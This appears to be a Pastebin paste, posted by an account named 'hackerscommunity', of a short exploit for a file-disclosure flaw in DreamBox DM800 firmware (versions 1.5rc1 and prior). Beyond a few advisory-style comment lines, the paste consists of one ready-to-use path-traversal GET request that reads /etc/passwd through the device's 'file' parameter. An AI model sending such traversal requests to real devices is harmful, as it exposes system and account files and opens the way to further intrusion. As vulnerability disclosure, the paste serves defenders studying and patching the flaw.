API tools faq
paste
Advertisement
hackerscommunity

DreamBox DM800 'file' remote file disclosure

hackerscommunity
Jul 11th, 2015
183
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.46 KB | None | 0 0
raw download clone embed print report
  1. # DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate
  2. # user-supplied input.
  3. #
  4. # Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on # computers running the vulnerable application. This may aid in further attacks.
  5. #
  6. # DreamBox DM800 versions 1.5rc1 and prior are vulnerable.
  7. #
  8. GET "http://www.example.com/file/?file=../../../../etc/passwd"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!